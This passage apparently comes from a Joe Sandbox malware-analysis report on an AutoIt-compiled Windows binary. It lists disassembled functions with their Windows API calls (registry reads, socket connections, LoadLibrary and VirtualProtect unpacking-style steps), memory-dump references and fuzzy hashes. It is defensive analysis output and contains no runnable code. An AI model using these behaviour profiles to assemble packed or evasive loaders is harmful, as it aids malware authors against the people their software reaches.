                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                • Opcode ID: c3fab48d321b9bff2d05686c2cb8b825098fda2b2c5a4015e9e1958c1a7ba820
                                                                                                                                • Instruction ID: 8d41d615dfb4361406ee4001e7804651a002f503058ea8dfd28cdeca4947d788
                                                                                                                                • Opcode Fuzzy Hash: c3fab48d321b9bff2d05686c2cb8b825098fda2b2c5a4015e9e1958c1a7ba820
                                                                                                                                • Instruction Fuzzy Hash: EBF03A70A412D87AE7306767AC0CE673F7EE7C7F20B01401FBA09A21B1C1660881EAB1
                                                                                                                                Function 00F2EB05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00F2EADA,?,?), ref: 00F2EB27
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00F2EADA,?,?), ref: 00F84B26
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00F2EADA,?,?), ref: 00F84B65
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: QueryValue$Open
                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                • API String ID: 1606891134-614718249
                                                                                                                                • Opcode ID: f0505ee641d9011bcd9dc52be6b72474d4097e830f44b78b6b1eb2263977a9cc
                                                                                                                                • Instruction ID: 3435cd049721400f89d0bf0a68b42d2d460b75d2ba31922c9c4af621961d2d4e
                                                                                                                                • Opcode Fuzzy Hash: f0505ee641d9011bcd9dc52be6b72474d4097e830f44b78b6b1eb2263977a9cc
                                                                                                                                • Instruction Fuzzy Hash: 74114F71A0411CBEEB04EBA4DD86EFE7BBCEF44364F500055B506E61A0EA70AE45EB50
                                                                                                                                Function 010730B0 Relevance: 7.7, APIs: 5, Instructions: 206memorylibraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 010731EA
                                                                                                                                • 6C3C6DE0.KERNEL32(?,0106CFF9), ref: 01073208
                                                                                                                                • ExitProcess.KERNEL32(?,0106CFF9), ref: 01073219
                                                                                                                                • VirtualProtect.KERNEL32(00F10000,00001000,00000004,?,00000000), ref: 01073267
                                                                                                                                • VirtualProtect.KERNEL32(00F10000,00001000), ref: 0107327C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual$ExitLibraryLoadProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3729624760-0
                                                                                                                                • Opcode ID: 1736a30b70182fe00e342c721cc663afb7e8cdf1c07c1d131c23aba06f7b885c
                                                                                                                                • Instruction ID: 56fbec862395c408a328bc9aa52067ca5ae3f8b05e781348e7eaaae0e9ec918f
                                                                                                                                • Opcode Fuzzy Hash: 1736a30b70182fe00e342c721cc663afb7e8cdf1c07c1d131c23aba06f7b885c
                                                                                                                                • Instruction Fuzzy Hash: 9551E871E542565BF7218ABCDCC06A4BBE4FB4122471C0778D6E2CF3C6EB905806A7A9
                                                                                                                                Function 00F56D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F13B1E: _wcsncpy.LIBCMT ref: 00F13B32
                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00F56DBA
                                                                                                                                • GetLastError.KERNEL32 ref: 00F56DC5
                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F56DD9
                                                                                                                                • _wcsrchr.LIBCMT ref: 00F56DFB
                                                                                                                                  • Part of subcall function 00F56D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00F56E31
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3633006590-0
                                                                                                                                • Opcode ID: 483514f8407b30e773b77e813395a081eba4214535052b32aff66f3dbf09e03f
                                                                                                                                • Instruction ID: 3ed9b86328ea735e45e8daa01681b1a7f5ac409491b52bda0fd302b5c1bceabc
                                                                                                                                • Opcode Fuzzy Hash: 483514f8407b30e773b77e813395a081eba4214535052b32aff66f3dbf09e03f
                                                                                                                                • Instruction Fuzzy Hash: 2E21C675A0231956DB207774EC4ABEA336C8F01332FA00556EA31C3092EF24CE88BA54
                                                                                                                                Function 00F69122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F6ACD3: inet_addr.WS2_32(00000000), ref: 00F6ACF5
                                                                                                                                • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00F69160
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F6916F
                                                                                                                                • connect.WS2_32(00000000,?,00000010), ref: 00F6918B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3701255441-0
                                                                                                                                • Opcode ID: f190473f8a704029c288b39d5f809e6313b87765322af834905509062e971f7a
                                                                                                                                • Instruction ID: 6a401639ffd9ff5f57641d00d5d415116d895d14bc3b3119deef7a8413dfc662
                                                                                                                                • Opcode Fuzzy Hash: f190473f8a704029c288b39d5f809e6313b87765322af834905509062e971f7a
                                                                                                                                • Instruction Fuzzy Hash: 7421D5312002149FCB00AF68DC89B6E77ADEF49320F148119F916AB3D1CBB8EC01AB51
                                                                                                                                Function 00F13DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F13F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F134E2,?,00000001), ref: 00F13FCD
                                                                                                                                • _free.LIBCMT ref: 00F83C27
                                                                                                                                • _free.LIBCMT ref: 00F83C6E
                                                                                                                                  • Part of subcall function 00F1BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00FD22E8,?,00000000,?,00F13E2E,?,00000000,?,00FADBF0,00000000,?), ref: 00F1BE8B
                                                                                                                                  • Part of subcall function 00F1BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00F13E2E,?,00000000,?,00FADBF0,00000000,?,00000002), ref: 00F1BEA7
                                                                                                                                  • Part of subcall function 00F1BDF0: __wsplitpath.LIBCMT ref: 00F1BF19
                                                                                                                                  • Part of subcall function 00F1BDF0: _wcscpy.LIBCMT ref: 00F1BF31
                                                                                                                                  • Part of subcall function 00F1BDF0: _wcscat.LIBCMT ref: 00F1BF46
                                                                                                                                  • Part of subcall function 00F1BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00F1BF56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                • API String ID: 1510338132-1757145024
                                                                                                                                • Opcode ID: 3d9cda2d7b49aededa30d4d9ad36c868bb736c8cc191e44056784db884f7646f
                                                                                                                                • Instruction ID: 4ccaacfe8abd122ece5cdc41886c74104fb9bfaf2db9f2fc6ee4ebc343717515
                                                                                                                                • Opcode Fuzzy Hash: 3d9cda2d7b49aededa30d4d9ad36c868bb736c8cc191e44056784db884f7646f
                                                                                                                                • Instruction Fuzzy Hash: 71915271910219EFCF04EFA4CC519EEB7B4BF49710F144429F916AB2A1EB389E45EB50
                                                                                                                                Function 00F3413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __getstream.LIBCMT ref: 00F3418E
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F341C9
                                                                                                                                • __wopenfile.LIBCMT ref: 00F341D9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                • String ID: <G
                                                                                                                                • API String ID: 1820251861-2138716496
                                                                                                                                • Opcode ID: 2e6a97ab45055542aae8013122c516010a453eb8c1c9b8a1732eb1559c3c9dac
                                                                                                                                • Instruction ID: de706c72cc9000f39b9d566c961ee26f9c2fc49e761c96cdfd4e0100dc86dd1e
                                                                                                                                • Opcode Fuzzy Hash: 2e6a97ab45055542aae8013122c516010a453eb8c1c9b8a1732eb1559c3c9dac
                                                                                                                                • Instruction Fuzzy Hash: BC11E771D00306DADB21BFB48C4276F36A4AF553B0F148525B815DB291EB7CE941B761
                                                                                                                                Function 00F2C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F2C948,SwapMouseButtons,00000004,?), ref: 00F2C979
                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00F2C948,SwapMouseButtons,00000004,?,?,?,?,00F2BF22), ref: 00F2C99A
                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,00F2C948,SwapMouseButtons,00000004,?,?,?,?,00F2BF22), ref: 00F2C9BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                • Opcode ID: d5855e04939c6c3da7530066b25e4206f48b82e7b473e3abc58351109de4b8ba
                                                                                                                                • Instruction ID: 0179ad96ff86fc791bbfb332cc1b943c558c65a25681354f1176bbc1d9abe0b5
                                                                                                                                • Opcode Fuzzy Hash: d5855e04939c6c3da7530066b25e4206f48b82e7b473e3abc58351109de4b8ba
                                                                                                                                • Instruction Fuzzy Hash: 89113C7691121CBFDB118FA4EC44EAE7BB8EF04754F10445AA945E7214D6319E90ABA0
                                                                                                                                Function 00F4A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3ad57b93f423629d5762f9907153b431dc1b8525b8db41808150475e85f99455
                                                                                                                                • Instruction ID: 03ee704e31561d997d97a0602afcc7bc2dd2d8d29de58c7ad30c67307df9d58a
                                                                                                                                • Opcode Fuzzy Hash: 3ad57b93f423629d5762f9907153b431dc1b8525b8db41808150475e85f99455
                                                                                                                                • Instruction Fuzzy Hash: F8C16075A4021AEFCB14CFA4C984EAEBBB5FF88710F104599E901EB291D734DE41EB91
                                                                                                                                Function 00F5CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F141A7: _fseek.LIBCMT ref: 00F141BF
                                                                                                                                  • Part of subcall function 00F5CE59: _wcscmp.LIBCMT ref: 00F5CF49
                                                                                                                                  • Part of subcall function 00F5CE59: _wcscmp.LIBCMT ref: 00F5CF5C
                                                                                                                                • _free.LIBCMT ref: 00F5CDC9
                                                                                                                                • _free.LIBCMT ref: 00F5CDD0
                                                                                                                                • _free.LIBCMT ref: 00F5CE3B
                                                                                                                                  • Part of subcall function 00F328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00F38715,00000000,00F388A3,00F34673,?), ref: 00F328DE
                                                                                                                                  • Part of subcall function 00F328CA: GetLastError.KERNEL32(00000000,?,00F38715,00000000,00F388A3,00F34673,?), ref: 00F328F0
                                                                                                                                • _free.LIBCMT ref: 00F5CE43
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1552873950-0
                                                                                                                                • Opcode ID: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                                                                                                                                • Instruction ID: 0ebf99f5285b9b27705c6113941f1c51092d5390da75773a99c2fe5245920d38
                                                                                                                                • Opcode Fuzzy Hash: 4c2a67bf80afeb39d6635efd2a9e9b252b70a840de711fe023f2a9c04e7b89ce
                                                                                                                                • Instruction Fuzzy Hash: 53515CB1D04218AFDF159F68CC81BAEBBB9FF48310F1000AEF619A3241D7755A849F69
                                                                                                                                Function 00F11E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F11E87
                                                                                                                                  • Part of subcall function 00F138E4: _memset.LIBCMT ref: 00F13965
                                                                                                                                  • Part of subcall function 00F138E4: _wcscpy.LIBCMT ref: 00F139B5
                                                                                                                                  • Part of subcall function 00F138E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F139C6
                                                                                                                                • KillTimer.USER32(?,00000001), ref: 00F11EDC
                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F11EEB
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F84526
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378193009-0
                                                                                                                                • Opcode ID: e3a4c2c51f6f21d1797182e33f3f613cd18f90a2cb99bf631ee733f726c74e55
                                                                                                                                • Instruction ID: f603a79c97c6c16145de02ac928241a12760632adf1f325f57e8c5756230ba8b
                                                                                                                                • Opcode Fuzzy Hash: e3a4c2c51f6f21d1797182e33f3f613cd18f90a2cb99bf631ee733f726c74e55
                                                                                                                                • Instruction Fuzzy Hash: 0421A771904798AFEB3297648855BEBBBECAB01318F14008EE79E57141C7746A84EB51
                                                                                                                                Function 00F692C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F282
                                                                                                                                  • Part of subcall function 00F2F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F5AEA5,?,?,00000000,00000008), ref: 00F2F2A6
                                                                                                                                • gethostbyname.WS2_32(?), ref: 00F692F0
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F692FB
                                                                                                                                • _memmove.LIBCMT ref: 00F69328
                                                                                                                                • inet_ntoa.WS2_32(?), ref: 00F69333
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1504782959-0
                                                                                                                                • Opcode ID: 86277e33d6c0aee5269a8cac65b59a39a88ddddb790bae09931944e99a9a237d
                                                                                                                                • Instruction ID: f38d17f389a3fb5272c85ce1862efdfc114a4a37b051fe63d7e75445dc81f3c4
                                                                                                                                • Opcode Fuzzy Hash: 86277e33d6c0aee5269a8cac65b59a39a88ddddb790bae09931944e99a9a237d
                                                                                                                                • Instruction Fuzzy Hash: D6116076600109AFCB04FBA5CD56CEE77BDEF483117104025F506A72A2DB38EE04EB61
                                                                                                                                Function 00F3010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F345EC: __FF_MSGBANNER.LIBCMT ref: 00F34603
                                                                                                                                  • Part of subcall function 00F345EC: __NMSG_WRITE.LIBCMT ref: 00F3460A
                                                                                                                                  • Part of subcall function 00F345EC: RtlAllocateHeap.NTDLL(016A0000,00000000,00000001), ref: 00F3462F
                                                                                                                                • std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                  • Part of subcall function 00F37495: RaiseException.KERNEL32(?,?,00F1125D,00FC6598,?,?,?,00F30158,00F1125D,00FC6598,?,00000001), ref: 00F374E6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
